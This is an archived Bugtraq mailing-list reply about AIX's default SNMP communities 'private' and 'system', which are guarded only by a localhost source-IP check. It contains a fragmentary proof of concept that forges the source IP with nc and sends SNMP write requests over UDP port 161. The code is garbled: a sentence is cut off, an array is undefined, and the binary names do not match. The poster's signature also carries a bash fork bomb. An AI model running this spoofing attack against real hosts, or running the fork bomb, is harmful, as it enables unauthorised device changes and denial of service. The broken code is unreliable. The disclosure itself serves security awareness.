Home page logo

bugtraq logo Bugtraq mailing list archives

Re: AIX SNMP Defaults
From: lcamtuf () DIONE IDS PL (Michal Zalewski)
Date: Thu, 17 Feb 2000 11:28:54 +0100

On Tue, 15 Feb 2000, harikiri wrote:

It appears that on the above releases of AIX, the SNMP daemon is
enabled by default and two community names are enabled with read/write
privileges. The community names are "private" and "system", but are
only allowed from localhost connections. Nevertheless, a local user
may install an SNMP client, and modify sensitive variables.

SNMP requests with no authentication except for source-IP comparsion, are


cat >/tmp/spoof1.c <<_EOF_
main() {  write(1,private,sizeof(private)); }

gcc -o /tmp/spoof1 /tmp/spoof1.c

/tmp/spoof2 | nc -s FakeSourceIPHere -u RemoteIPHere 161

UDP blind spoofing, nothing easier.

Michal Zalewski * [lcamtuf () ags pl] <=> [AGS WAN SYSADM]
[dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
[+48 22 813 25 86] [+48 603 110 160] bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]